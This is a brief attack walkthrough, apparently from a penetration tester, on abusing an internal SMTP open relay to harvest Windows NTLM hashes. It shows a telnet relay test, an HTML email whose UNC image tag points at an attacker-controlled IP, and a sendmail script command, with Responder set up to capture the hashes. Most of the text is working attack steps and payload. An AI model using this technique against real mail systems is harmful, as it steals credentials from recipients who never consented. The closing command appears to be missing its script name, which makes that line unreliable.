SMTP Internal UNC Relay Exploit

A quick walk through on how to exploit internal relay via smtp, this bypass common outlook restrictions on blocking auto downloading of images, so when you identify a vulnerable target this can result in easy hash collection.

telnet IP-Address 25

Trying IP-Address…

Connected to IP-Address.

Escape character is ‘^]’.

220 ************************************************************************************************


250 Hello [IP-Address]

MAIL FROM:name@domain-name-co.uk250 1.1.0 Sender OK


250 1.1.5 Recipient OK


354 Start mail input; end with <CRLF>.<CRLF>

Please email me (Add address) if you receive this?


250 1.6.0 <> [Internal ID=221411] Queued mail for delivery


It’s a little tricky to end the message while testing but, <CRLF>.<CRLF> = press enter . press enter

If you see Queued mail for delivery this is a great sign as it indicates that the target is vulnerable to internal smtp relay.

1. Write your email and save as .htm (to do this I use outlook to create the email, I send it to myself and save it as a .htm)

2. Open the in notepad++ delete out all sections not required.

3. Add the UNC image tag to the bottom line of the email just before </body>


<img src=”file:///\\IP-Address/test”>



Then to send the email you can use any method which accepts .htm emails and supports relay, I commonly use @strawp sendmail script.

4. Use script

5. Set up responder

6. Send the email using sendmail script, syntax below.

python -g SMTP-IP-Address -p 25 -e Email-address -b UNCPic.htm -f -s question